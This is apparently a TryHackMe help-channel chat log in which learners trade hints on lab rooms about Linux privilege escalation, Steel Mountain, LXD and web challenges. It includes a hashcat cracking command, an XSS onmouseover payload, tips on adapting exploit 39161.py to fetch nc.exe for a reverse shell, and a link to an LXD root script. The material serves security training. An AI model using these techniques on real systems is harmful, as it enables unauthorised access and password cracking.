Hi, I'm doing https://tryhackme.com/room/commonlinuxprivesc and at task 4 answering the second last question. I'm tried/etc/passwd and /etc/shadow. The box says Uh oh! undefined so not sure if the answers are incorrect. Is one of these correct or is there some other place I should be looking?

That's your antivirus

BitDefender?

Yep

That worked, thanks.

Hi, I'm doing https://tryhackme.com/room/linuxprivesc# and at task 15. I got the root bash. When I run whoami, it shows root but my uid and gid is still showing 1000 (user) and using sudo -l, it is still saying that I can only run the same commands as User user without password. So does this mean it is not a true root bash?

And also may I ask how do I post screenshots along with my questions?

!docs verify

yes it does show your uid and gid as user but you can then do use some other techniques to become "real" root

like this :

which is given in the other tasks

Ahhh, I see. Thank you very much for the explanation.

Gave +1 Rep to @slender dawn

yeah this was just one of the methods you can do

also you should verify so that you can send screenshots

I'm so sorry. Still a little unsure about this. So basically I just put the "!docs verify" and then ctrl v whatever screenshot I have?

You have to follow the steps in the link

Ohhh, okay.

Thanks alot!

Thanks again!

np

Good evening everyone. I am unfortunately failing the last question from the quiz of https://tryhackme.com/room/bpsplunk. What is the website where you can find the Splunk forums at? I have not found any forums, but only the community pages, but none of the links here is the correct solution. Please send h3lp ..

splunk changed the setup resently, but just think of the subdomain as somewhere to get "answers" for your question

Hello I'm doing OWASP Juice Shop room and I can not answer or understand what the question is for Task5 Question 3 - Download the backup file. I have downloaded the file from the FTP server and I have got the MD5 hash of the file and that's not right for the answer I have also looked in the file and I can not see a flag in there as well. I guess my issue is more whats the question ?

Please don't ask the same question over multiple channels

please for get this question the web site has now given me the guild, after deleting my cookies

Does anybody know if there is a PS command to find the number of logs for an event. Right now I'm trying: PS C:\Users\THM-Analyst> Get-WinEvent -Path C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx. But it just prints out all events which i don't want; all i want is the "count or number of events" is there another command i can add to filter just this? or am i going about this completely the wrong way?

try adding | measure to the end of your command

That worked! Thank you so much, I was going crazy looking for that.

Gave +1 Rep to @pure thistle

np

not familiar with kerbrute.. not sure if im correct on command line

should run if you change -d to -domain and -users userlist.txt

userenum doesnt req a -

and try --dc instead of -dc-ip

Halo

I'm new

Hello Guys
I'm stuck in the room zthweb2
Section3 API Bypassing Challenge. I've used big.txt without any results 😢
somebody can help me plz ?

Hi, I'm doing https://tryhackme.com/room/steelmountain# task 4. When trying to set up the web server on port 80, I get an error saying that the address is already in use.

a program is already using port 80, kill it

How do I change the code of 39161.py so it grabs nc.exe from other ports?

I can't. I'm using the vm from the browser and once I kill the process, the vm disconnects.

in you command specify one another port like 81

Thanks! I'm trying to do that. But can't get the 39161.py file to grab from the port. Do you have any idea how I can change it so that it works?

Gave +1 Rep to @real geode

the second parameter is the port, you need to put the correct port (like 81 if you use it in your python -m ...)

Are you referring to the local_port parameter in my previous screenshot? That is actually to tell nc.exe (the netcat binary for that task) which port to connect to so that we can get the reverse shell. I believe this is the part where the script is trying to get the nc.exe file from my machine. Do you know how I can state the port here? I tried adding ":portnumber" behind the +ip_addr+ but it said there was a syntax error.

Add it in the quotes after

Not just to the end

So sorry, still don't get it. Can you explain a little more?

ip_addr+":port%2F....."

Ohhh, thanks! I will go try it out.

Gave +1 Rep to @stuck fractal

Morning - Quick Question please - When saving a private id_rsa key what file format do i save it as?

You don't?

I would have thought .pem but the shh server is returning invalid file format

File extensions are meaningless outside of windows pretty much

Is this for a tryhackme room?

its the LFI room

Ok. You don't save it with any extension.

hmmm

im still getting a invalid file format for my key

Make sure there aren't any spaces in weird places. Make sure there is a single blank like at the end.

Invalid file format or invalid format?

!docs verify

Follow those steps amd then you can post images

its says - key invalid format

screenshot please

But please check the things I suggested

checking now - thanks

sorry that isnt clear at all

I can't wait till they invent printscreen

i couldnt find the shortcut

is there a leading space?

also no single blank line at the end like James mentioned

ok ill try that thanks

mine on my current host looks like this

not the same but

same format

all spaces look ok

There's a space at the start where there shouldn't be, in that image

and we also can't tell if there are trailing spaces etc

thanks gents, issue solved. there was a space at the end

I figured out thanks

Gave +1 Rep to @remote gate

i m doing room cooctus stories

when i compare both the commits inside of plain text i get this

im stuck on year of the rabbit i got eli's ssh password but don't know to switch to gwendoline any hints.

np i got what i was looking for

how would you guys expolit this shit

Do it in two steps rather than one

if you are really really stuck you can look at ||CVE-2019-14287||

hints would be good

Hi- could not get a rev shell either- did you find a solution? Sp far, I can only get a shell when using THM Attack box- suspect a python script issue

you need to run the full command

Eh there's another step to it that's important

i got it from here thanks for input https://www.bleepingcomputer.com/news/linux/linux-sudo-bug-lets-you-run-commands-as-root-most-installs-unaffected/

Gave +1 Rep to @pure thistle

right now im stuck on another box lol

how do i crack this ??

Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Salt: aReallyHardSalt

dictionary attack.

hashcat -m 1800 hash2.3 /usr/share/wordlists/rockyou.txt

cat hash2.3
$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02:aReallyHardSalt

i did

Please don't ask the same question over multiple channels @split breach

Ok

what happened

@white salmon ninja is helping me out in #room-help you can come over there

What does the test"do in: test" onmouseover="alert('Hover over the image and inspect the image element')"

closes the quotes

but what does the word do?

"test"

nothing

nothing exciting

interesting

you can probably exchange that for anything

Yeah, I saw that

I even removed it

still works

so is "onmouseover" a specific command?

yes, it activates when your mouse pointer goes over the element

The keyword is an attribute

It belongs to the element

https://www.w3schools.com/jsref/event_onmouseover.asp

oh, so that's the vulnerable attribute in the js code?

not necessarily, just a way to activate it

interesting

there's so much to learn

I need to understand why certain things are happening

Hey eveyone! I'm trying to gain root access to the GamingServer box with no success. I don't know the user's password because I got access using their id_rsa key. I've searched for suid files and ran linpeas.sh locally and nothing really caught my eye that would help me escalate my privileges. I'm thinking I overlooked something, or that there's a 'deployment system' somewhere to be picked at, but I don't know what that is. Any hints as to where to look to progress further?

I haven't done that room, but other things to potentially look for are services running on the machine, local ports being used. If linpeas didn't give you anything useful, then that rules out a lot of the easy things. Is there perhaps some other service or port running on the machine that you can do something with?

in terms of services running on open ports, no. only the webserver and ssh. The apache config files didn't have anything useful for us I believe. the user has stuff in their /home/.config files (a subfolder named lxc), but I can't tell if it's important or not

link the room?

https://tryhackme.com/room/gamingserver

ah. Yeah, that doesn't give a lot of hints to work with

supposed to be a 'game server' box but idk what software or binaries would be related to that.

oh well, thanks anyways. I'll look at it again tomorrow, gotta eat 🙂

it's strange because getting initial access was a breeze

maybe try replacing one of the services the game server uses?

Do a strings on the binaries that are running, see if you can restart them?

look at user's groups use the id command

I did check and lxd was peculiar (it's also highlighted by linpeas), and a quick look online reveals that it's related to linux containers and whatnot. Is this the lead?

yes google lxd exploit

Ok thanks I'll do that after a snack. Everyone stay hydrated!

haha How can we tell when/that "this is it" though, there are so many things to learn

lol once you do the lxd exploit the next box you do that has a user in the lxd group you will probably start with that exploit first i know i do

as for how do you know when "this is it", I'd say: anything that gets you any kind of escalation or new information.

i.e.: when it works

Thank you both @worn otter and @pure thistle , I got the flag. It's a pretty nice trick indeed

Gave +1 Rep to @worn otter

I know right now whenever you see a user in the lxd group go for it 😆

I am doing the relevant room

I got a shell as web user

Any hints for privesc

https://github.com/CyberJunnkie/LXDAutoPrivilegeEscalator/

I wrote a script which gets you root if you have a lxd on box

cool👍

Nice nice

Need a hint, I'm on Linux Fundamentals Q7, finding shiba4 password. The bin is supposed to check if I have directory test in my home directory, and file test1234 in directory test... Need a nudge in the right direction from what I have so far

Yep, so you need to find the binary

You haven't quite done that yet

Oh hmm

I come up with nothing when running find / shiba4 I'm just stuck with the find command

Yep, that syntax isn't quite right

At the moment you're saying list all files in / and all files in shiba4

Got it, had to do find ../.. -name shiba4 -type f -print -quit

Thanks, James

Any hints for Room Ignite, root flag? I ran linpeas but couldnt find anything I could exploit
|| I thought it might be one of the SUID binaries like pkexec or pppd|| but couldnt exploit that as well

What do you typically do first when gaining a shell through a web application?

hello, ive just been going through the linux basics rooms. Im stuck at task 14 of room 2. can anybody help?

It's always best to directly ask your question

Someone can't know if they can help unless they know the problem

its about chown

How would you change the owner of file to paradox

is the question

but i dont really get chown yet

it is no longer necessary to put "#!" at the beginning to make a bash script?
I ask this because I was able to run a script without initially adding "#! / bin / bash

Is this for a specific tryhackme room?

It sounds like it's generic.

Please use #infosec-general for generic questions that aren't room related.

oh ook sorry

Hi there, I hope somebody has a tip for me on what to do here.

I am busy with network services (SMB) right now. I am supposed to find the contents of a file but I spent the last 30minutes struggling with it. Any ideas?

i have tried using open , get among other commands in the smb shell to try and get something

I get an error that reads NT_STATUS_OBJECT_NAME_NOT_FOUND

Heya, could you provide some more information like a screenshot of what you tried? In order to send screenshots you need to verify

!docs verify

Oof. Sorry I neglected to verify

I am going to try again a bit later then I will share screenshots. Thanks for reaching out though

thanks for the hint. I will try to decode it 😛

Gave +1 Rep to @narrow wren

Got the flag! I thought I had tried what I did earlier but hadnt. Thanks

room nmap, task 8, second quest

I understand that this scan is more stealthy and circumvents some firewalls, but I can't identify the specific answer he wants, any tips?

It's in the text

It's not for stealth

damn, very specific kkkkkk thank you

hi guys
Can you please advise how may I follow up on this one?

I got the file and was able to get do the changemod but I have not clue how should I work out uid and pw

Use the key to log in via SSH. Get the flag

You don't need the password because you're authenticating with the key

am I still suppose to do this part from terminal? ( i have only used 'ssh uid@ip' so far )

will try to look up, thank you

That's a good start but you need to use the key

has anyone been able to figure out how to find the answer to the security question in the OWASP Juice shop room "Your mother's maiden name?"

https://tryhackme.com/room/owaspjuiceshop => task 4

https://tryhackme.com/room/networkservices
Task6

What exact answer is required here?
I have almost checked every nmap option but Service is unknown

found nothing else which can be referred as 'title'

did you use -A with nmap?

the non standard port mentioned in the previous question definitely has a title that will lead to that answer